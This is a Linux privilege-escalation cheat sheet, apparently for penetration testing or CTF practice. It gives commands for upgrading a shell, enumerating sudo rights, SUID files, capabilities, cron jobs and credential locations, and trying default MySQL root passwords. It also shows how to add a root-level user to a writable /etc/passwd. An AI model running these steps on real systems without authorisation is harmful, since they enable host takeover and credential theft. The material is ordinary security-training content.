Privilege Escalation
Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.
Step 1: Upgrade Your Shell
Make your shell more stable & interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200
Step 2: Enumeration – System Context
Capabilities & Tooling
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat
Compilation / System Info
file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issue
Arch & Kernel
file /bin/bash
uname -a
Step 3: User Context
Are we a real user?
sudo -l
ls -lsaht /etc/sudoers
groups <user>
env
Users & homes:
cd /home/ && ls -lsaht
Step 4: Credentials & Configs
Check for web creds:
cd /var/www/html/ && ls -lsaht
Check /etc/
for unusual configs:
ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'
SSH keys:
ls -lsaR /home/
Other dirs of interest:
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
Step 5: Escalation Primitives
SUID / GUID
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
Check exploitation paths: GTFOBins
File Capabilities
getcap -r / 2>/dev/null
Reference: Linux File Capabilities
Step 6: Process & Cron Monitoring
Running Processes
ps aux | grep -i root --color=auto
Network
netstat -antup
netstat -tunlp
Cron Jobs
crontab -u root -l
cat /etc/crontab
ls /etc/cron.*
Process Monitoring (pspy)
# On attacker machine:
cd /var/tmp/
# Transfer pspy
chmod 755 pspy64
./pspy64
Step 7: Databases
Check for MySQL root creds:
mysql -uroot -p
# Try common passwords:
# root, toor, (empty)
Step 8: File Transfers
Check what’s available:
which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'
Step 9: NFS
Check for exports:
cat /etc/exports
👉 Look for no_root_squash
→ Attacking NFS Shares
Step 10: Persistence / Living on Host
Writable locations:
/var/tmp/
/tmp/
/dev/shm/
Check mounts:
cat /etc/fstab
Step 11: Local Port Forwards
If vulnerable services are only on 127.0.0.1
:
Use
meterpreter
port forwarding.
Step 12: Direct Root via /etc/passwd
/etc/passwd
If writable:
openssl passwd -1 i<3hacking
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id
Step 13: Miscellaneous
Mail:
cd /var/mail/ cd /var/spool/mail/ ls -lsaht
Files by specific user (ex: bob):
find / -user bob 2>/dev/null
Tools
Last updated